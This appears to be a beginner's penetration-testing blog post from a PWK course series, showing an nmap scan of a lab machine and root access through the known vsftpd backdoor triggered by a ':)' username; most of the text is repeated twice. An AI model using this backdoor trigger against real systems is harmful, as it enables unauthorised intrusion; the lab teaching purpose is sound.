Its recon smile please.[Service Vulnerable to smile]
The prettiest smiles hide the deepest secrets
Hi, all with a big smile don't ask me why you will get to know later. So today will continue our PWK journey. We were in reconnaissance active stage where we can interact with our target directly. Today we will be learning
so let's start
What is port scanning ?
Ports scanning is the process of checking for open TCP and UDP ports on a remote machine. I prefer to perform port scanning using a tool called Nmap which is the most widely used tool in the infosec community.
There are good books available for Nmap https://nmap.org/book/ check out the link if you find interesting ones suggest me I will have a look.
Only fun here no serious business. So let's run Nmap we will be checking
sV: we will use this switch to know service/version info
O: yeh easy to guess switch is for to enable OS detection
Command: nmap -sV -O 192.168.0.14 -p1-65535
You guys wanna see the magic allow me to call Jarvis
In Iron Movie J.A.R.V.I.S. is Tony Stark's natural-language user interface computer system
J.A.R.V.I.S. run the command in kali and get a screenshot for my friends. It is so easy right.
Finally we are in the victim machine with root-level access. Good but the question is how hmm it was because of vulnerability exists in vfstpd service. Sure we will do code analysis of vfstpd service.
In the above screenshot after grabbing banner we did something interesting we inputted the special characters to bypass vfstpd service access control by passing 0x3a 0x29 that is 0x3a = :
0x29 = ) these hexadecimal characters represent smiley face yes coder purposely kept the backdoor while writing the program for that service.
yes else if condition meets that means our vsf_sysutil _extra function got executed sockets were created to make a connection.
Hi, all with a big smile don't ask me why you will get to know later. So today will continue our PWK journey. We were in reconnaissance active stage where we can interact with our target directly. Today we will be learning
- How to scan ports
- Run Metasploit framework
- Use exploit and run against target and get root-level access
- Look into purposely vulnerable service we can call it backdoor in our case. :)
so let's start
What is port scanning ?
Ports scanning is the process of checking for open TCP and UDP ports on a remote machine. I prefer to perform port scanning using a tool called Nmap which is the most widely used tool in the infosec community.
There are good books available for Nmap https://nmap.org/book/ check out the link if you find interesting ones suggest me I will have a look.
Only fun here no serious business. So let's run Nmap we will be checking
sV: we will use this switch to know service/version info
O: yeh easy to guess switch is for to enable OS detection
Command: nmap -sV -O 192.168.0.14 -p1-65535
You guys wanna see the magic allow me to call Jarvis
In Iron Movie J.A.R.V.I.S. is Tony Stark's natural-language user interface computer system
J.A.R.V.I.S. run the command in kali and get a screenshot for my friends. It is so easy right.
ok ok, I will stop doing my blah blah blunders so follow the screenshots.
Finally we are in the victim machine with root-level access. Good but the question is how hmm it was because of vulnerability exists in vfstpd service. Sure we will do code analysis of vfstpd service.
In the above screenshot after grabbing banner we did something interesting we inputted the special characters to bypass vfstpd service access control by passing 0x3a 0x29 that is 0x3a = :
0x29 = ) these hexadecimal characters represent smiley face yes coder purposely kept the backdoor while writing the program for that service.
yes else if condition meets that means our vsf_sysutil _extra function got executed sockets were created to make a connection.
Comments
Post a Comment